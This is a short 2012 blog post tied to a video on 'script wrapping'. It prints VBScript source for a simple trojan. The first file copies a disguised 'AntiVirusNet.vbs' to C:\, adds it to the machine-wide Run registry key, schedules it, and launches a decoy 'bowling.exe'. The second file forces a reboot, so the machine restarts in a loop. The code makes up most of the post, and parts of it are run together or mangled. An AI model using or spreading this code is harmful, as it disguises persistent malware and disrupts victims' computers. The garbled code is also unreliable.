Writing a Virus in VBscript

By | February 3, 2012

Source: Youtube

Suffice to say that any information I post on this blog concerning any kind of malware it is to be used ONLY as a learning resource. You should look at this type of software in a self contained environment to avoid any damage to yourself or anyone else.

 |  |

This video will discuss the principal of “Script Wrapping” using the example of a simple VBscript / WMI based Trojan Horse Virus.
This is presented for educational purposes ONLY and should not be used in malicious fashion.The VBScript code used in this lesson can be found over here:
http://jaysn.blogspot.com/2008/03/learn-windows-scripting-act-3-class.html

The code below is the code referenced in the video.

‘File 1 Romcs.vbs
HKEY_LOCAL_MACHINE = &H80000002
strComputer = “.”
Set WSHShell = CreateObject(“Scripting.FilesystemObject”)
WSHShell.CopyFile “AntiVirusNet.vbs”, “C:\AntiVirusNet.vbs”
Set ObjRegistry = GetObject(“winmgmts:{impersonationLevel = impersonate}!\\” & strComputer & “\root\default:StdRegProv”)
Return = objRegistry.setStringValue(HKEY_LOCAL_MACHINE,”Software\Microsoft\Windows\CurrentVersion\Run”,”WRSPXPBXUpd”,”C:\AntiVirusNet.vbs”)
If Return <> 0 Then
msgbox(“Keine Admin Rights!”)
Else
Set objWMIService1 = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)
Set colComputers3 = objWMIService1.ExecQuery(“Select * from Win32_LocalTime”)
For Each objComputer2 in colComputers3
Hou = objComputer2.HourMin = objComputer2.Minute
if Hou < 10 thenHou = 0 & objComputer2.Hourend if
next
if Min < 10 thenMin = 0 & objComputer2.Minute
end if
Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)
Set colComputers2 = objWMIService.Get(“Win32_ScheduledJob”)T = “C:\AntiVirusNet.vbs”D = “********” & Hou & “” & Min & “00.000000+000”
‘+1 hour automatically
erret = colComputers2.Create(T,D,JobID1000)Set WSHShell1 = CreateObject(“WScript.Shell”)WSHShell1.Run “bowling.exe”‘WSHShell.DeleteFile (“*.vsbs”)End IF

‘ File 2 AntiVirusNet.vbs
On error resume nextstrComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set colComputers2 = objWMIService.ExecQuery(“Select * from Win32_OperatingSystem”)For Each objComputer2 in colComputers2objComputer2.Security.privileges.AddAsString “SeShutdownPrivilege”, trueerrRet = objComputer2.Reboot()next

Leave a Reply